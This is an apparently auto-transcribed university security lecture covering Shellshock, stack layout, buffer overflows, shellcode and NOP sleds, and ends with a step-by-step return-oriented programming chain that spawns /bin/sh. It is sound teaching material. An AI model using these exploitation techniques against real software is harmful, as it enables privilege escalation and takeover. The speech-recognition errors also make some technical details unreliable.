 Folks, thanks for coming. I was just mentioning that I appreciate you showing up on a short week So I'd like to start us off by talking about free money Everybody loves free money. All this money is definitely not free, but Who here is an American citizen? I want to let you know about because I realize I don't think I've done this yet Is that we have a scholarship for service program here at ASU funded through the National Science Foundation so the National Science Foundation just gave us a $4 million grant to give out scholarships to students It's actually super cool program to be eligible you have to be a U.S. citizen and the idea is for every year so they'll completely pay for your tuition as well as let's see full-time tuition and education reimbursements Book allowance plus a stipend so you actually get paid to go to school on top of tuition and everything And in exchange you agree to go work for the government for every it's like roughly for Let's say they pay for your schooling you go work in the federal government for a year It's a specifically around security. So The idea is that they They're gonna pay for your education and you pay them back by working for them Is it retroactive? No No, but it is Very soon to be active. So if you actually get your application in In like the next week or two They can actually start funding you starting spring 2018 So if you have one more semester left, then even yes, you could do that Two weeks is probably not enough So U.S. citizen, this is master's and master's so even if you're doing your master's you can do this the idea is so You do interchip during the summer we fly out to DC so you can go to job fairs and talk to interesting people there So some of the people who've gone through there that I know have gotten jobs. I like the NSA and various other organizations, so this is a super cool program if and I think it's nice to go to school plus After your usually you'll get security clearance as part of this most of the jobs require you to get security clearance and so You go do your time Working in the federal government and then you're actually completely set if you want to continue on public service path Or you want to go into industry and make a ton of money because you have clearance and you have the experience of actually working in a real Organization doing security stuff and it's super easy to apply. That's the other thing It's just an application form with your resume and official transcripts It's really easy This is an old old out of date, but if you would like to talk to you can you know me I'll send you to Dr. Yao. Dr. Yao is in charge of organizing and managing the program Any questions? It's super cool cool. Okay, so we are oh before we get started on this Assignment four is gonna be up today It's gonna be super fun. It's going to be a binary server where there will be a Options of different challenges and you have to break these services challenges and In order to get points for how many that you break. I don't know the exact breakdown yet, but it will be super fun You highly doubt that Fun for me Before I send out an email because this will be like a shared server I've tried to put protections in place, but don't be oh So don't be a worthy malicious in the sense of like trying to toss the server that's super lame What else could you do don't like write a thing that uses up all of the Free space on the server because that I just have to go in and implement like things to stop that in the future And it's really going for me, so don't do that Yeah, it'll be cool So now instructions later cool. All right, so we were talking about command injection The example I want to bring up is a bug called shell shop. Does anybody remember this? hearing about this a Few people so this was a bug in September 2014 that it existed for about 20 years in bash so the idea was the We've seen that environment variables are basically inherited from one program to another and That's actually passes its environment variables to other instances of that In addition to passing variables, which you think yes, of course that makes sense you can actually actually passing functions to other instances of bash by setting an environment variable whose value starts with parenthesis like open and close parentheses and then the Function body that you want so the first thing that does when it starts up is look at the environment variables and see is there any Variable names that start with these parentheses is so that basically evals that code and so by pending commands there You can basically execute arbitrary functions So this was a huge problem. We talked about We talked about github actually allowed a few SSH access to their servers in a very limited way Well, they're actually running bash and so you can actually pass this environment variable of SSH original command to Let's say Whatever access these these shadow CGI web applications, so this is basically So CGI web applications are web applications that are executed as if they were binary and they get their inputs from the environment variables And the environment variables are controlled by the user so the user can Make requests to a web application to get arbitrary code execution arbitrary code execution without any Without any like authorization all you need to do is make a web request. That's why this is actually a really big deal I think this may have started the cool vulnerabilities with cool names and logos All right, so I think it's one of these cases where As it was originally written was probably a feature that then when bash started to be used in all these different cases Became to be a huge security bug And I think the documentation around this functionality was incredibly poor as well in the sense that Normal people like almost nobody knew about this functionality And so it's basically just code that nobody ever used but it included this functionality so Yes, it's kind of the thing of like a feature if you change the environment, right or take an application put it in a different environment that feature could now be a security bug so Now we're going to talk about buffer overflows. So this is going to be our introduction to kind of be main one of the core security vulnerabilities in Applications and that is something that is so silly that it seems like why should this ever even be a problem? And that is the lack of boundary checking when you're writing C or C++ applications So what I mean by bound boundary checking here. What boundaries do I care about checking? What is a buffer? Say someone's first name Exactly, so I think this was I think explicitly had a test base on assignment one of the secure this house Where I just made absolutely huge like people names Because expecting the same thing about what size they were so if you're writing a C program and only had let's say allocated a space of like size 100 to read people names that should crash that program These are still one of the most popular types of attacks They can be And they show up in all kinds of different applications The actual exploit is going to be architecture operating system dependent you can run these both locally or remotely and the key capability that a buffer overflow Can allow is it can allow you to alter the code or the data of the application? Well, sorry, I just read right that the data you can alter the data of the application and you can alter the control flow of the application So what's the control flow? Yeah, what the program is going to do an execute next and it's actually a way We're not used to thinking about programs right we look at the code and we can see okay This the main function starts to execute so line one executes and then two and then three And then depending on this branch condition line four will execute or line five will execute and after that this function We call right. It's very easy and clear to see the control flow There's actually a lot of research into how to automatically exploit these more abilities So there actually are tools out there that can find buffer overflows and automatically generate an exploit for them Which are very cool, and there's also a lot on the flip side of saying okay How can we actually prevent these successful exploitation of these attacks so? There's mitigation techniques, and of course you have this awesome One of the reasons I love security is because you have this awesome arms race where the attackers say okay We're gonna excellent buffer overflows the high-tech control flow, and the attackers go great We're gonna completely randomize the memory layout so you never know where The stack is and so they go okay, and so attackers then say okay Then we'll up our game, and we will figure out as we'll see we'll do return oriented programming or return to live See techniques so I don't even care where the stack is And so they say okay, well let's change the location of them see and then it's this escalating game But attacks always get better, so without fundamentally solving this issue You're still going to have these types of attacks So in order to understand that we need to understand the stack This should be familiar to you if you took 340 with me, so what is the stack in terms of the? Computer architecture, so not the abstract data structure of a stack. What is the stack? What does that mean so anything that your program needs for memory such as local variables It'll put on the staff to use in that scope, and then The second what Currently with staff winners Right, so similarly to the that abstract stack data structure Right, we push things onto the stack, and then we pop things off the stack But it's not just a huge array that we can write whatever we want to but yes great And as we talked about we'll start at high memory addresses and grow grow down so the stack will be growing when it is Decreasing in value. That's actually a tricky thing to conceptualize, but it's fine And a function so a function can do whatever it wants of the stack So it could use this essentially as scratch memory as we said and The assembly language really does support this mechanism on x86 So the register ESP holds the memory address of the current location of the top of the stack or Think about stacks you put thing on them in the top You could also say it's the bottom and you look at it our way of high below And so we have instructions like push EAX which says Store whatever is in the register EAX on the stack and move the stack down enough to make room We have pop EAX which does the reverse which moves things off the stack So here's a brief example So we have all f's all zeros. We're at memory location here hex 10,000 So if this is our stack pointer, so if I tell you does this that This is the top of the stack is hex 10,000. What's the value that's going to be in ESP? Hex 10,000 exactly so that's so these two are intricately like you can't you don't know where the top of Stack is if it's not in ESP, right? Whatever's in ESP is that so what do we know about everything? in our diagram Above address 10,000 It's got important stuff in it right that is all in the stack and everything By that same logic that everything below that should be not important stuff or garbage right stuff that we don't care about So we have some super simple instructions push EAX push EVP if our registers look like this where we have 10 in EAX and 0 in EVX ESP as we said will have hex value 10,000 we'll start here We'll push EAX which actually means that the stack pointer will be decremented so the stack pointer will move down four bytes and EAX will be pushed the value that's inside the EAX register will be put into memory At where these stack pointers pointing and no we're not drawing this a hundred percent precise because this would be four bytes So it'd be zero zero zero zero zero a I don't know which order that would be the end in this but we'll ignore that for now And finally when we pop EVP We will take that we will First take the value that's at currently where the stack pointer is take that hex a Copy it into EPX and then increment the stack by four Essentially freeing that memory and saying okay. That's now we can reuse that memory great So we just did two instructions that essentially copied EAX into ebx, but using the stack Questions on the stack now we need to understand to understand really the problems of a Buffer overflow we need to understand so what is actually stored on the stack? So as already mentioned the stack is used for scratch storage one of the main reasons is for local variables is This is where local variables are stored for each instance of an executing function in the current Pong graph so the idea is that Basically every the current executing function will have its frame pointer in EVP For ease of use reasons. We don't want to use the stack pointer to reference into our function frame So it's something like this. So we have our main function. We have local variables a b and c is 10 100 10.45 a is equal to a plus b return zero So what the Compiler does when it sees local variables it basically generates an offset from EDP and says okay at EDP a will be at some EDP plus a value and Everywhere in this function to every reference to this a I will use EVP EVP plus 4 Same thing with b and c and then Combining the code actually becomes really easy because you say okay at the memory of EVP plus a set that equal to 10 at the memory of EVP plus b set that equal to 100 and So forth 10.45 and then finally a is equal to a plus b So it's kind of a pseudo code translation of what's going on there and then it compiles it out Actually out to x86 code So for instance the compiler can choose whatever order it wants for a b and c does not matter There's no specification that says it has to do it one way or the other Historically, it's usually well, I think it's usually in this order where it's kind of where A will be at the most bottoms. We have a piece. Actually I take that back. I have no idea what order it's gonna be The truth is to figure out the order you have to look at the assembly code if you're ignoring the assembly code and just looking at the c code There's no guarantee that they're even related at all So we have ebp minus c b ebp minus 8 c is an ebp minus 4 we're gonna move so The first thing that needs to happen When a function is first executed it needs to create space For its local function frame and it needs to store The previous stack pointer because the current sorry the current base pointer will be the function of whoever called it so the very first thing it does is Well, let's go through this. Sorry. Let's ignore that for now It needs to create space on the stack so it creates 16 bytes on the stack by Decrementing the stack pointer by 16 says another one of these things where subtraction is actually getting you more space on the stack We then move a Into ebp minus c We move 64 which hacks 64 to 100 the ebp minus 8 We'll move this crazy value to eax and then move eax into ebp minus 4. What's this crazy value? 10.45 in floating point and then we will move Let's see ebp minus 8. What's ebp minus 8 here? B and what's in B right now 100 so it's going to be 100 into eax. It's going to add eax to ebp Sorry, yeah into e with ebp minus c ebp minus c is a Wait, that's all right. Move this in here. Okay, move B into a add Add B is equal to a plus b. Yeah, okay Okay, so when you have it to so add you usually think of in this way of a is equal to a plus b Here you have add eax to ebp minus c Which is a so it wasn't be you're adding to a and then the Destination is the second argument here. So state saving that value back in ebp minus c Okay, cool. So looking at how this all actually works So we will have our stack pointer here We'll so we first have to subtract 10 from ESP Which is well decimal 16 base Yeah, so 16 here. So now this is our function frame. So now we have two pointers There's two arrows here, right? The arrow at 10,000 is our base pointer So all of our local references will be on that fixed for this execution of this function base pointer and Our stack pointer could change depending on what happens But this proceeds as you would expect we put 10 into a we put 64 into b and we put the crazy value That was a 10.45 into ebp minus 4 Then we're we'll move ebp, which is here 10,000 minus 8 which is x64 Into bax and we will add that with 10 questions here Okay So we saw in this example that we're clearly storing space in each function frame for the local variables But the question is So if you're a function that gets called How do you know where to go back to or why do you need to know that so what happens when a function is done executing? It's the program terminate if return store it was called from but as we've seen CPUs and we talked about are incredibly dumb Right. They just execute instruction instruction instruction instruction instruction instruction They actually don't have any concept of function calls or anything like this, right? This is something that we essentially add in memory and so We need some way to go back to the function that called us And we need other things too when you call a function Do you want to just do something and then return? What do you want back from that function when you call return value? Yeah, there may be a return value that you want, right? There may be and you have to actually pass in parameters to a function So I have a function. How do I know how to grab parameter one or a or b or whatever the value is? We need our frame pointer. We also need the return address So we need to know where to go back to we have local variables and temporary variables So the idea is the calling convention defines how one function calls another and Specifically who does what in relation to all of these things so all of these things must be stored on the stack They need to be stored in memory because the CPU has no idea about any of this stuff so We need some kind of calling convention. It's super annoying because this varies based on processor operating system compiler or even type of call so for instance as we saw with syscalls When you're making a syscall into the kernel you Yeah into the the kernel you call in avian you put the syscall you want in eax and then the other values in ebx ecx But you put the parameters you want to pass into registers However, the normal calling convention for calling functions in Linux does not use registers it uses the stack But this changes now on a 64-bit operating system, which has a different system call entirely so You just have to look this stuff up. This isn't something you just magically are born knowing You have to like study these things and think about it and look at it up code So the idea is the caller first pushes the arguments onto the stack in order for right to left So if you think about it the rightmost argument will be the Will be here and then the second will be underneath that and then underneath that one four five however many arguments there are Right so the stack is growing down Then the caller as a byproduct of the call instruction will push the address of the instruction after the call So this is super important because this answers the question. Where do we start executing after this function call? The call in the function that gets called it's their responsibility to save the previous frame pointer if they're going to use it To create space on the stack and ensure that the stack is consistent And finally which actually is surprising because you pass arguments onto this step You pass arguments to a function by putting them on the stack But you actually put the return value in the EAX register There's all kinds of architecture decisions on who should do what and all this type of stuff, but we won't go into that Let's look at an example. So look at our main again We'll have a local variable a we'll set a equal to calling a colleague function 1040 return a We'll have the colleague function within a and B return a plus B plus one So when we compile this and we'll run object up on it to look at the assembly We can look and we'll see push EVP move the Base pointer to the stack pointer. No stack pointer to the base pointer. Sorry. I was Move the stack pointer into the base pointer subtract 18 hex from the stack pointer move ESP plus move 28 on the ESP plus four Keep talking about it. Okay Right. So the first thing so important parts when you're looking at assembly codes So almost every function will have an incredibly similar prologue here Which essentially first because main is a function like any other Right. It has to return Somebody actually calls main and sets the exit status of your process to whatever you return from main And that's how your process is an exit status gets set And so just so main itself has to follow the calling convention Main itself has to first store the previous callers base pointer So this is push EVP which is move the stack pointer down first base pointer there then Move the current stack pointer to the base pointer So basically setting up wherever you are on the stack right now This is now your base pointer for me and then you create space on the stack for you So you move the stack pointer down by 18 hex And then we have function at the end which is called the epilogue which essentially redo everything That the prologue did And gets us back, but we'll go through there in a second. The other function pushes EVP So again, right, this is what you have to do every single time push EVP Move the stack pointer to the base pointer then move EVP plus C into EAX move the EVP plus 8 into EDX Basically add EDX plus EAX move it into EAX and one pop EVP and return so again a prologue and an epilogue So why is this using EVP plus 8 and this is using EVP minus 4? Yeah, right, so what is so what would you say that EVP plus 8 is and calling the arguments the function, right? Exactly the base pointer will see the base pointer will point into the function frame And above that base pointer, right positive increments of the stack would be the arguments that the caller passed in Whereas negative offsets from there will be local variables local to that function So this EVP minus 4 is this local A value And this I don't know which order this is actually doesn't matter, but 8 and C are either A or B cool So we can look through this to see what happens We can see that actually if we do object them. We'll see that these Bites get compiled and we saw that the elf header will specify That these instructions must be in the program at these fixed locations You can check this out. I Don't remember what version I did this in so if you do this on your own You will get completely different numbers just FYI and also depending on your GCC version. You'll get different output as well Okay, so we have our KB stack. We have our registers. We are ready to virtually go so Let's say our stack first starts at FD2D4 So that will be the current stack pointer main is called and We know we're at this instruction because the instruction pointer will have the address of that instruction Then when that instruction executes Let's say the base pointer or something whatever We push EVP on the stack We move the current stack the current stack pointer to the base pointer Thus setting up here in our base pointer our local main base pointer We subtract 18 from the stack pointer. So now all of this is the main function We then move 28 into ESP plus 4 so that's that pointer plus 4 which is up here We move 10 into Where the current stack pointer is and then now we're going to call the function So what have we done to the stack right before this call? the values that were Passing into the function Right, so exactly. So which one's which? Needs right to left so would it pushes it on from right to left 28 should be the left most The first paragraph Pushes on it from right to left the right most argument was it be Right, and so it be is pushed first Which means it will be the top most of these arguments and then the argument after that the left most argument which is a Which is it? Is a and it's actually Is pushed on to the sack I should have done this We'll push that on to the sack so we have x a here So now when the coli function Executes it knows how to fetch both of these values and it knows that the first argument will be this one and the second Are you will be four above that? But we need to leave a breadcrumb. We need to know we just can't start executing from 804 83 94 Because where do we want to go back to after coli? Executes where do we want to go back? Yes x 804 83 vm. That's the instruction we want to execute after coli is executed But how does coli know to go back there? There's no magic here, right? We can't just magically try to signal where we want to go and so This is why the coli instruction here is different from it. Let's say a jump instruction So you can have a jump to jump to a location But here we want to call this function. So basically there's two things it sets these the instruction pointer to whatever this value is and It pushes on to the stack the what we call the saved instruction pointer or the next instruction that we want to execute after Coli is done executing So that's where this 804 83 vm came in because this is where we want to go Right, this is our way to tell the function that we're calling. Hey, this is where we want you to go back So you can think of this like a breadcrumb right main is like leaving a little breadcrumb so that that way the program knows how to go backwards And so coli is gonna do its thing it's gonna push evp. It's gonna Move stack pointer to base pointer set of its own stack pointer. So we can see from its current Base pointer here of fd2d0 So we can see where that currently is is the save base pointer of the previous function frame And above that is the same instruction pointer of the person above Who's called it and then finally the arguments from left to right because now we're going up the stack Right, so this is a and then this is b and so this is how it knows, okay Here's main here's coli and so it knows great move evp plus C. So C should be 28 here, so it should be 28 to eax 8 move a into eax add them together add one Pop evp. So now we're actually returning for this function So we're gonna set the base pointer back to whoever call us and now is the most critical part when it comes to security here Is that now because remember again coli does coli know that it has to Go back and start executing that 804 83 bf No What does it know that it has to do next? Wherever the stack pointer whatever Value is currently at the stack pointer. That's what we want to go execute next Right because coli doesn't know this is the whole point right your functions aren't designed to be called from only one location So it's just hard coded to go back right now functions designed So it can be called by anywhere in your program So the idea is the return instruction literally just you can think of it as a pop Eip so take whatever values currently on the stack Put it in the instruction pointer and just start executing from there So that will then move the the instruction pointer here, and we'll do the same thing we will Move that into eax do that We'll do a leave which is the opposite of these two steps Because you might be doing too much and then somebody called me So what's the value that's right above right at fd2d4? Do we know what it is the hex value that's there? No, do we know roughly what type what it should be? And no fights And that's what we'll go execute right main job is done. It doesn't care who called it It just knows okay when I call this return. I'll just go execute from whoever called me So now what happens? When we overflow a pre-allocated buffer so we've given ourselves a character buffer of a hundred characters or something on the stack and We overwrite it with whatever 200 characters or something So normally it's going to cause a segmentation fall. So Which was maybe the bane of your existence for the first couple of times you didn't see and see plus plus And maybe it still is hopefully not but it definitely still happens, so don't go back So we already know okay if we can give input to a program to cause it to just crash that's an availability attack, right? Which is good, you know that's something we want to find and prevent But we can actually specially craft this in order to jump wherever we want in the program And the idea is that whatever we execute is executing with the privileges of that program So if it's a set uid root program then That if we can trick it to somehow execute code of our choosing that code will have permission to root not as us All right, cool. So now we need to look at this so Basically the same base pointer So you're the previous function for a base pointer and the same construction pointer stored on the stack And we can control them. So I think about this like How do you refer to the story of console console Greta? How does not more of you And the idea is You have this brother sister Doesn't matter these kids who go to the forest and the dark forest and they're scared So they want to be able to find their way home So they were smartly taking a piece of bread like a loaf of bread and as they're walking every feet or so They leave a piece of bread on the ground Right, which is great because they can go out do whatever they want and then they get home They just follow the bread trail home Right, what's the problem with that plan? It's no problem. It works out fine for them in the end Get the breadcrumbs. What was that? Yeah, well, what happens if either a person or even just birds come and eat that bread right now You get to a point and you're stuck and you you're trying to follow the reverse trail home And you get to a point you're stuck and you don't know where to go Now you're lost in the woods or if a very either a malicious person or a very smart bird Is able to rearrange those breadcrumbs Maybe take their own loaf of bread and make reverse breadcrumbs like right back into your oven or something So you can cook and eat these children, which is essential with the stories about I'm trying to And that's exactly what we're gonna do here cool, okay, so we're gonna have a Function my copy that copies its argument onto a four-byte character buffer We will have So we're passing my copy in this string into my copy So looking at the assembly we have kind of so we can see here We have our epilogue then we're moving this value, which is presumably the location memory of this character pointers This is gonna be the bytes at this memory location will be the bytes ASU space CSE. We'll call that function We will then call printf and then we will put zero in EAX. We're just gonna be return zero Whereas my copy will do its thing And the important thing to do is look at how this actually works. So We have similar situation So we now have our instruction pointer here. We're gonna do the prologue We're gonna save the base pointer. We're gonna set up our base pointer for our current ASU function frame We're going to create space on the stack for our local variables. We're going to move 804-8504 into ESP Then we're gonna call my copy So why did this value get here on the stack 804-8483? The return instruction pointer Yes, it is the same instruction pointer, which we look it should be 804-8484 23 So it should be this instruction because main wants this instruction to execute next, right? So my copy starts executing it goes great doing my copy doing my thing I need more room for a stack because running stacks are hard and then I get here I get here. I finally call string copy and so we can see here So I put 804-8504 So this is the pointer the memory address of the string that long string we passed in What's this FD2AC value? Didn't actually call string copy yet So we're right up to call string copy we haven't actually called it yet So before we call the function, what do we need to do? Yeah, we need the source and the destination buffer so if we looked at string copy we see that the right most is the source and the left The other one is the destination so FD2AC so FD2AC is here So this is our character buffer that we allocated on the stack Way back Let's not risk it All right So now we're gonna call string copy and string copy. Does string copy know that our buffer is only size 4? What does string copy do? What's bites and buffers until when? How many bites? Not quite close. How does it know that there's not any more bites to put? No, yes, so basically string copy you could write this. It's very simple You just literally dereference the destination Copy it into source Or you dereference the destination check if it's null your return Otherwise copy it into the source increment both pointers you're pointing to the next bite And you just keep doing that over and over and over again, right? So it's not bounded by the size of the buffer Right the destination buffer It's bounded by the size of the input So when string copy returns, what happens so we know at 0804 8504 are these bites followed by a null bite And so what's gonna happen? Well, just like we said string copy is incredibly dumb It's gonna copy ASU space here and then CSE and you can actually see you know, these are the actual hex representation of that there and Is it gonna stop because it says oh this was only four bites long No, it doesn't know it's just copying memory, right? These things are There's no internal concept to a C string of the length or or sock me of the size of the buffer I guess there is but the length the length is up to a no way So it's gonna keep copying right and like So it got rid of the arguments and just like our story the same base pointer and the same instruction pointer right so just like ours our Example of birds coming and blowing away We've completely overwritten the same instruction pointer and the same base pointer and actually was going to keep overriding things and then string copy returns because it so string copy goes where to return to because we didn't put it but the instruction pointer will be here. So What was it my copies? Instruction pointer of 8804 840 C will be stored here. So that gets returned to you correctly Everything actually goes just fine. We execute these next instructions is fine. We do a leave which actually takes the Fall and puts it into the EVP which now makes our base pointer point wherever and then we get to a return Where the program will start trying to execute at 31 30 32 20 So what happens then crash is segmentation fault It's gonna try to access some memory that's not allocated to the program in our analogy Our program is now lost in the woods. It doesn't know where to go. So it blows up And you can actually do this if you run this example If you run it and get a segmentation fault if you run it in GB and debug it you will see that it actually Has a segmentation fault because it trying to access 30 30 130 32 20 Which was the last part of our string and if we look at all the registers We'll see that yet. We change the base pointer and we change the instruction point So at this point, we actually control the instruction pointer and get this program to execute wherever we want so Functions to keep in mind that are essentially always dangerous gets because you're getting data from the user and You get data from the user until there's a new line or end of file So fundamentally when you're calling this function, you have no idea how big the data could be So there's no way to properly create a buffer in advance for String copy if the attacker can control the source buffer They can supply as many characters as they want in order to overflow the destination buffer S print dev sd print dev scanf series of functions Also custom input routines that they're calling even get see which is getting a character But they're essentially implementing one of these things and just adding to a buffer. You can get over rights there the question is So it's very clear we can get it to crash and that's a good first step, but we want to go further. We want to not Take down the availability of that program. We want to be able to custom control the that program and so How do we execute that so the idea is once we control EIP? It's kind of game over at that point Once we do that Essentially, we can tell the program to go wherever we want There is an excellent paper, which I really just turned 20. I think Yeah, I called smashing the stack for fun and profit. This was one of the first is published in a hacker magazine called frack And it's really good read I highly recommend looking through it because you can see that even back then to think about we've had this for like 20 plus years, and this is still an incredibly common vulnerability in attack okay, so first and What I'm going to do here is I'm actually going to take you up to a modern day So your first kind of thought is well, we want to execute some so we can control the instruction pointer We can control where this program goes so Why not just Inject onto the stack so we went back here What if we inject onto the stack instead of injecting ASU CSC 340 fall whatever whatever what if we injected bites that actually Did what we wanted to do? Let's say it's a root program in like I don't know Whatever gives us a bash shell has root Right, we can inject in here onto the stack assemble instructions and then just tell the instruction pointer Hey, go to the start of these instructions and start executing them Which is the first round so the idea is this is called shell code So shell code is the name for any kind of code that you're executing that's location-independent Just like we talked about though the arms race arm race is that the operating system vendors and the defenders said well great in order to do this You need to know exactly where to go with the instruction pointer to tell the instruction pointer So for instance here if let's say the start of this ASU was the start of our shell code. We would have to make sure we overwrote I believe it was this one 31 30 32 20 with FD to a seat Because that's where we wanted to execute next So the idea is well, what if we completely randomize the location of the stack every execution? That way you won't actually be able to guess and know where to go So the bad guy said okay great What I'll do is I will add a bunch of knobs like a no op which is hex 90 to the start literally like you can do a hundred bags of no ops and Then all you have to do is guess your address somewhere within those no ops and just like you think like a slide or a sled You start doing nothing nothing nothing until you hit your shell code and actually do what you want Which actually on 32 in our textures is reasonable You can even use not sleds of like a gigabyte to completely Work around the SLR so it only takes like 10 guesses to be right because as we learn an attacker only needs to be correct once Right, so then the defender said okay. That's a good technique like that. The SLR doesn't really get around that So what if we out so the main problem is who wants to execute code on a stack? What's the stack for is it for executing code? No, it's for reading and writing data. It's scratch memory Right to do programs need to execute code on the stack So probably one of the programs you use most often a browser does this all the time So browsers do what they call just in time compile JavaScript code So actually take JavaScript code compile it to assembly and we'll execute it And that code will either live on the stack or in the heap And so some programs actually need Executable stacks because they want to be on the SQ code there So for most programs you don't need that so the idea is hey We saw in the elf that you can in the elf file format you can specify the permissions of all of these memory sections So just make the stack not executable Solve right because now it doesn't matter even if you know the addresses you start executing here and I compile And the operating system says error. You're not allowed to execute code in this memory page So we'll throw an exception. It actually won't work So to get around that but the Interesting thing is but what about all of these instructions? So what are the what are the permissions have to be on? Let's say the memory that's an address 804 840 E It usually is have to be rightful at this memory just 804 840 e which are the bytes that represent push Probably doesn't have to be it could be but you know why you don't need to write change your own code What about executable have to be executable? specifies that at memory address 804 840 e Must be the bytes that correspond to the assembly instruction push EDP if you want your program to work that has to be executable It can't not be executable right and Our most programs is small. No, they're freaking really big right and so The idea is essentially well, why don't we reuse chunks of the actual code that's executable and Because the way most programs are compiled they're compiled where these memory locations The executeable code is that fixed memory location. It's not So that actually led to return oriented programming. So this is a super interesting Concept it's actually really awesome. So let's walk through an example The idea is we're going to use little what we call gadgets in the code So something like I don't know push something onto the stack and then return or add one to a variable and then return and we can basically you can think of setting up these These breadcrumbs in such a way that the existing code does what we want it to do and essentially will call the system call But we want to call Really great paper. It's called the The geometry of innocent flesh on the bone and the idea is in any sufficiently large body of x86 Executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able By means of the return into limc techniques we introduced to cause the exploiting program to undertake arbitrary computation. So We're not going to talk about returning the limc But basically the idea is you just set up a function frame to call the limc function I'm going over rock because it's the more generalized technique here So, how does this work? So the idea is and so actually what I didn't tell you on that last example I didn't disable To actually exploit that previous example, I would have had to probably disable some security features like SLR this stack randomization Or non executable stack So we'll see here an example The idea is we basically here have super simple string copy rv1 Which is the first argument onto foo return 10. So foo is size 50 So we always need to look at the code. So main has push evp All this fun stuff string copy cool So one thing I'm doing is to make this slightly easier as I'm stacked. I'm using the dash static flag I'm compiling this. What does that do? Do you think a Executable with what is this like 10 lines of assembly code should be 716 kilobytes all of a sudden they know why is it so big? Yes, because that's well specifically because the dash static flag statically links are executable Which means rather than loading up limc in the DLLs It's not DLLs, but like the SO of the library files that we need at runtime It actually compiles them all into the executable. So everything is there, which is nice If you're shipping a binary to somebody and you don't know if they have the specific libraries you need to install, but Cool So the idea is We want to find gadgets in the binary that will perform things for us And we want to essentially encode our shell code or encode this idea of Exactly e slash bin slash bash or bin sh because bin sh is shorter into the gadgets So what we need to do so looking through the system call we look at system calls What we need is we need the hex value B, which is 11 to be in the AX That tells the operating system. We want to call exec VE We need the address of slash bin slash sh into the EBX register And we need the address of so this is the RV pointer To an array where the first argument is the first element of that array is the address of bin sh The next thing is null any CX and we need null into EBX Okay, so where do we put bin sh? We need to somehow get that into the program So we can actually look at this executable Actually, we would find it So surprisingly Bin sh you can actually find in libc version. So this compiled version will actually have The string slash bin sh because it's used somewhere in libc You can find the address of this string In the binary itself, which is super Now we need to be able to write some data. Yeah Why are we using EAX, EMS, ECX instead of the stack We're pushing because we are making a system call into exact VE That uses the exactly yeah, that uses the system call calling convention the Linux calling convention so we So we need to put the system call before we call it in 80 We need B to be in the AX and we need to set these registers up correctly But we need things we need to be able to write some data somewhere. Oh, that's right. Okay, right So we can actually see That at 08 oe a 060 so at this memory location will be data we could write to So we can actually include in our stack the string slash bin slash sh as long as we can somehow find a gadget that will write that out to someplace in memory and And the place that we can use at a fixed location is going to be this location, because we know it's writable. So we can use any memory location that's writable. But we need to find some gadget that will do that. So we can, there's tools that will point you to the end that we could use. So we can find out that actually at location 809A67D will copy whatever's in EAX into the memory location that EDX points to. So this will take whatever's in EAX. So if we can somehow get slash BIN that X value into the EAX register, we can then force the execution to jump to this gadget 809A67D. And this little tiny gadget will just copy that to wherever EDX is. So we need to control EAX and EDX. So it's still a lot, but we can get slash BIN at a fixed memory location. But we need to go gadget hunting some more. So we need some gadget to get data we control into EDX. And what do we control in this situation? We control the return instruction pointer, what else? What is that return instruction pointer on? Top of the base pointer. Yes. But in the function, it's both on. What memory location are they? Where does the same instruction pointer live? On the stack. Yes. We control the stack. We can completely control the stack. We can write more or less whatever we want under the stack. So what we're looking for is a pop EDX and then return. And it just so happens that in this memory location, there's a pop EDX followed by a return. So this will take, remember, pop will take a value off the stack. It will literally take the value off the stack, put it into the EDX register. So great. So this helps us by now we can put the address of dot data onto the stack. And if we looked at this, so basically this is the address 0806E91A, 0806E91A. And if we execute this, we'd see that when we got here. So here's the instruction we're going to start executing as. So what this is going to do is pop EDX. So let's say this is the first gadget that executes. It's going to take whatever's above that on the stack and put it into the EDX register. Thus we can completely control the EDX register. And then it's going to return to whatever is above that. So we can actually put the next gadget we want to execute the instruction pointer, the pointer to that instruction on the stack. And so essentially we're creating this stack of all these little tiny instructions of take this value, put it in this register, copy this value over here to get us to do what we want to do. So using this, but we still need to get our data into EAX. And it turns out there's a pop EAX return at this memory location. There's a pop EVX return at this memory location. The crazy thing to think about is remember, x86 is not a fixed length architecture. So even if you have a really long, that does not necessarily mean that these instructions actually exist in the code itself. It just means that there could be a five byte instruction and this pop EET return is only two bytes. So as long as those two bytes that you need occur anywhere in executable code, you can jump to the first byte and it will start executing. We can find all of the pop EAX, pop EVX, pop ECX. We need some way to clear EAX. And it's a really great way to clear a register to zero is to XOR it with itself, which happens to be at this memory location. But what do we need to be inside EAX? Not just zero. We need 11. We need XB. So we can find an add 10 to 11 to EAX, but that's highly unlikely to happen. Instead, if we find an increment, we can just call this 10 times on our stack or 11 times. And we need an N80. So this is actually all we need in order to build a rock, what they call a rock chain. So you're going to have a chain of these little gadgets to completely take over this code. So we actually want a Python script to do this because doing this by hand is super annoying. So we can use this pack. So the pack will make sure that the endianess is taken care of. So the first thing we're going to do, this is pop EDX return. So this is the address of data. So this is where we want this to go. So this is going to copy. So this gadget is going to copy whatever's after it into EDX. Then the next gadget that execute this return is going to execute this next gadget, which is going to take whatever's after it onto EAX, which is slash bin. Then we need to call our move instruction to have copy slash bin into EDX. We then copy slash slash SH, which is a little trick that I'm going to get into. I usually want slash SH zero, but oftentimes you want to avoid no whites. So you can use slash slash SH, which is exactly the same. So we can copy that and to data plus four. So we're going to do our same thing again, with slash slash SH. We're going to zero out the thing after it because remember we need, and so we can do that, XOR it, move that there. Now we actually have an alternative string slash bin slash SH at this fixed memory location. But now we need to build our array. So we need to build our array. I'm just going to kind of go through this so you can step through this. So now this is building up the arc V pointer, which is a pointer to pointers. So this is a pointer to an array of pointers. Now we'll finally have, we'll be able to call exact VE with the address of data with the string to SH, the address of data plus 12, which will be our array. And we know that data plus eight is a null byte. So this will be, so we need to first get the address of data into EVX. We then get the address of data plus 12 in EVCX. Third argument, EAX, we're going to zero it out again, increment it 11 times, like I said, and then finally call it 80, which will trigger the execution of our code. And so what we can do, we can set a break point at this location. We can run this program with this as input and we can see right before it returns what's going to happen. So we can see the stack, right, is essentially all of these little gadgets. And so it's going to essentially go through every single gadget doing exactly what we said, putting tiny bits. So you can see, like the instruction pointer, so these are not in contiguous memory locations, right? I'm just doing this for, for show here. You can see this is at 806, is at 80B, 809, 805, right? But the stack has pointers to all these little gadgets that are executing. And it's just going and doing whatever it's supposed to do. It's executing executable code. It's using fixed memory locations. We can see that at that memory location is the string slash bin slash slash SH. We can continue and we'll see that it's actually executing a new program, which means we successfully exploited this buffer overflow. And it's a fully address-based layout organization proof rock payload. Because no matter what the stack 